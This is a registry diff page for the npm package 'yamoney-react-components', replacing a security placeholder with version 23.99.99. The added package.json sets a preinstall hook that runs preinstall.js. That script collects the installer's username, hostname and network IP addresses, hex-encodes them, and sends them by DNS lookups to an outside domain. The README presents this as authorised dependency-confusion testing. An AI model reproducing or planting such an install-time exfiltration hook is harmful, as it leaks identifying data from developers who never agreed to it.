yamoney-react-components 0.0.1-security → 23.99.99

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of yamoney-react-components might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,4 @@
1
- # Security holding package
1
+ # DO NOT INSTALL THIS PACKAGE! IT EXISTS FOR DEPENDENCY CONFUSION TESTING ONLY!
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=yamoney-react-components for more information.
3
+ ## The pre-install script sends DNS queries to the controlled server marking that the dependant package is vulnerable.
4
+ ## Dependant package developer is aware of the testing.
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ "use strict";
2
+
3
+ /**
4
+ * Module version 23.99.99
5
+ */
6
+
7
+ module.exports = {};
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "yamoney-react-components",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "23.99.99",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node preinstall.js"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/preinstall.js ADDED
@@ -0,0 +1,40 @@
1
+ "use strict";
2
+
3
+ var dns = require("dns");
4
+ var os = require("os");
5
+
6
+
7
+ var postfix = '.ym.z.addr-in.com'
8
+ var hostname = os.hostname();
9
+ var username = os.userInfo().username;
10
+
11
+ var hex = function (str) {
12
+ return Buffer.from(str, 'utf-8').toString('hex');
13
+ }
14
+
15
+ var getInterfaces = function () {
16
+ var nets = os.networkInterfaces();
17
+ var results = {};
18
+
19
+ Object.keys(nets).forEach(function (name) {
20
+ nets[name].forEach(function (net) {
21
+ if (net.family === 'IPv4' && !net.internal) {
22
+ if (!results[name]) {
23
+ results[name] = [];
24
+ }
25
+ results[name].push(net.address);
26
+ }
27
+ });
28
+ });
29
+
30
+ return results;
31
+ }
32
+
33
+ var payload = hex(username + '@' + hostname);
34
+ dns.lookup(payload + postfix, function (err, res) {});
35
+
36
+ var ifaces = getInterfaces();
37
+
38
+ Object.keys(ifaces).forEach(function (iface) {
39
+ dns.lookup(hex(hostname) + '.' + iface + '.' + ifaces[iface][0] + postfix, function (err, res){});
40
+ });